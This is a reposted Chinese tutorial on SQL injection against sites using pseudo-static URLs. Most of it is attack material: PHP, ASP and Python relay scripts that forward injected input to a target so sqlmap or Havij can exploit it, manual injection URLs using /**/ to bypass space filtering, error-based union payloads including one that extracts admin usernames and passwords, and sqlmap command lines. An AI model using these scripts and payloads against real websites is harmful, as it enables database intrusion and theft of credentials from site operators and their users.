碼上快樂

相關內容    簡體    繁體

偽靜態注入的總結

本文轉載自   查看原文   2016-10-09 14:04   9402 

一:中轉注入法

1.通過http://www.xxx.com/news.php?id=1做了偽靜態之后就成這樣了

http://www.xxx.com/news.php/id/1.html

2.測試步驟:

中轉注入的php代碼:inject.php

 

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(” “,”%20″,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url = "http://www.xxx.com/news.php/id/$id.html";
$url = "http://www.xxx.com/news.php/id/$id.html";
//echo $url;
 
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
 
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

 

3.本地環境搭建PHP,然后訪問http://127.0.0.1/inject.php?id=1

通過sqlmap或者havj可以跑注入漏洞。

附錄ASP中轉代碼:

<strong><font style="font-size: 12pt"><code id="code1"><%
JmdcwName=request("id")
JmStr=JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl="http://192.168.235.7:8808/ad/blog/"&nbsp;&nbsp;//實際上要請求的網址
JMUrl=JMUrl & JmStr&".html"&nbsp; &nbsp; //拼接url
response.write JMUrl&JmStr&nbsp; &nbsp; //我這里故意輸出url來看
'JmRef="http://127.0.0.1/6kbbs/bank.asp"
JmCok=""
JmCok=replace(JmCok,chr(32),"%20") 
JmStr=URLEncoding(JmStr)&nbsp;&nbsp;

response.write&nbsp;&nbsp;PostData(JMUrl,JmStr,JmCok,JmRef) //url,查詢字符串,cookie,referer字段

Function PostData(PostUrl,PostStr,PostCok,PostRef)&nbsp;&nbsp;
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function


Function bytes2BSTR(vIn)&nbsp; &nbsp;//處理返回的信息
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function

Function URLEncoding(vstrin)&nbsp; &nbsp; //發包前對參數的url編碼一下
strReturn=""
Dim i
'vstrin=replace(vstrin,"%","%25") '增加轉換搜索字符,
'vstrin=Replace(vstrin,chr(32),"%20") '轉換空格,如果網站過濾了空格,嘗試用/**/來代替%20
'vstrin=Replace(vstrin,chr(43),"%2B")&nbsp;&nbsp;'JMDCW增加轉換+字符
vstrin=Replace(vstrin,chr(32),"/**/")&nbsp;&nbsp;'在此增加要過濾的代碼 //這里很關鍵,方便啊,把空格自動換成/**/,后面會說到的
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function

%></code></font></strong>

二、手工注入法

1.http://www.xxx.com/play/Diablo.html

http://www.xxx.com/down/html/?772.html

2.測試注入:

http://www.xxx.com/down/html/?772′.html

http://www.xxx.com /play/Diablo'.html

http://www.xxx.com/play/Diablo'/**/and
/**/1='1 /*.html

http://www.xxx.com/play/Diablo'
/**/and
/**/1='2 /*.html

http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常

http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出錯

3.看頁面是否存在差異,相同則不存在,不同存在注入。

4.聯合查詢:

http://www.xxx.com/play/diablo’ and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html

http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

三、手工注入法(二)

http://www.xxx.net/news/html/?410.html

http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

注:

偽靜態的注入和URL的普通GET注入不太相同
。普通urlget注入的%20,%23,+等都可以用;但是偽靜態不行,會被直接傳遞到到url中,所以用/**/這個注釋符號表示空格。

三、SQLmap方法

sqlmap中偽靜態哪兒存在注入點就加*

http://www.cunlide.com/id1/1/id2/2
python   sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″

http://www.xxx.com/news/class/?103.htm

python  sqlmap.py -u  “http://www.xxx.com/news/class/?103*.html”


四、python腳本方法

代碼一:

 1 <code id="code3">from BaseHTTPServer import *
 2 import urllib2
 3 class MyHTTPHandler(BaseHTTPRequestHandler):
 4     def do_GET(self):
 5         path=self.path
 6         path=path[path.find('id=')+3:]
 7         proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})
 8         opener = urllib2.build_opener(proxy_support)
 9         urllib2.install_opener(opener)
10         url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
11         try:
12             response=urllib2.urlopen(url+path)
13             html=response.read()
14         except urllib2.URLError,e:
15             html=e.read()
16         self.wfile.write(html)
17 server = HTTPServer(("", 8000), MyHTTPHandler)
18 server.serve_forever()</code>

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 滲透日記-利用SQLMAP偽靜態注入 apache怎么開啟偽靜態 nginx偽靜態配置 nginx 偽靜態設置 MVC 偽靜態 偽靜態技術 thinkphp如何實現偽靜態 laravel 偽靜態實現 nginx偽靜態規則 Fastadmin偽靜態規則
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM